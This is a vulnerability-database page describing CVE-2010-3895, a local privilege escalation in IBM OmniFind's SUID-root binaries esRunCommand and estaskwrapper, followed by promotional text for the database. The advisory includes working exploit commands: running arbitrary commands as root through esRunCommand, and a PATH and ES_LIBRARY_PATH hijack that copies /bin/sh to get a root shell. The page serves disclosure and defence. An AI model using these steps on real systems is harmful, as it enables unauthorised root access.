IBM OmniFind Privilege Escalation Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2010-3895 | 12 Nov 201021:00 | â | cve | |
| CVE-2010-3895 | 12 Nov 201021:00 | â | cvelist | |
| IBM OmniFind - Local Privilege Escalation | 9 Nov 201000:00 | â | exploitdb | |
| EUVD-2010-3873 | 7 Oct 202500:30 | â | euvd | |
| IBM OmniFind - Local Privilege Escalation | 9 Nov 201000:00 | â | exploitpack | |
| CVE-2010-3895 | 12 Nov 201022:00 | â | nvd | |
| IBM OmniFind Cross Site Scripting / Privilege Escalation | 10 Nov 201000:00 | â | packetstorm | |
| Command injection | 12 Nov 201022:00 | â | prion | |
| Design/Logic Flaw | 12 Nov 201022:00 | â | prion | |
| IBM OmniFind - several vulnerabilities | 18 Nov 201000:00 | â | securityvulns |
10
===============================================
IBM OmniFind Privilege Escalation Vulnerability
===============================================
* Privilege escalation in two applications (CVE-2010-3895)
Root SUID bits are set for the applications ûesRunCommandë and ûestaskwrapperë.
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------
ûesRunCommandë takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
[email protected]:/opt/IBM/es/bin> ./esRunCommand id
OUTPUT: cmd is id
id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
The application ûestaskwrapperë is meant to start the application ûestasklightë.
The pseudo c code looks like this:
-------------------------------------------------------------------------
main() {
int auth = 0;
...
if (argv[1] == "estasklight") {
auth = 1;
...
path = getenv("ES_LIBRARY_PATH");
if (path) {
setenv("LD_LIBRARY_PATH", path);
setenv("LIBPATH", path);
...
if (auth) {
execvp ("estasklight", args);
}
...
}
...
}
...
}
-------------------------------------------------------------------------
Explanation of the code:
ûargv[1]ë is the first command line argument, that is compared with the string
ûestasklightë. If it is equal the ûauthë flag is set.
If the user has the environment variable ûES_LIBRARY_PATHë set, the value is
copied to two new environment variables ûLD_LIBRARY_PATHë and ûLIBPATHë.
If the ûauthë flag is set, the application ûestasklightë is executed.
Exploit for running /bin/sh
-------------------------------------------------------------------------
[email protected]:~> cp /bin/sh ~/bin/estasklight
[email protected]:~> export ES_LIBRARY_PATH=/home/joemueller
[email protected]:~> export PATH=/home/joemueller/bin:$PATH
[email protected]:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
# 0day.today [2018-03-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Nov 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.00782